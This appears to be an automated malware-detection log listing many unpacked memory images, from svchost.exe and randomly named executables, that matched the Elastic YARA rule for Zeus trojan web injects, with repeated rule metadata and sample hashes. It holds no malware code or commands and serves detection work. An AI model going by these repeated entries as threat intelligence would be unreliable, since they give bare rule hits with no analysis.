Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.22.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.406400.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.25.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.32.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.18.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.20.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.24.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.35.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.13.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.407000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.23.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.38.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.28.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.29.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
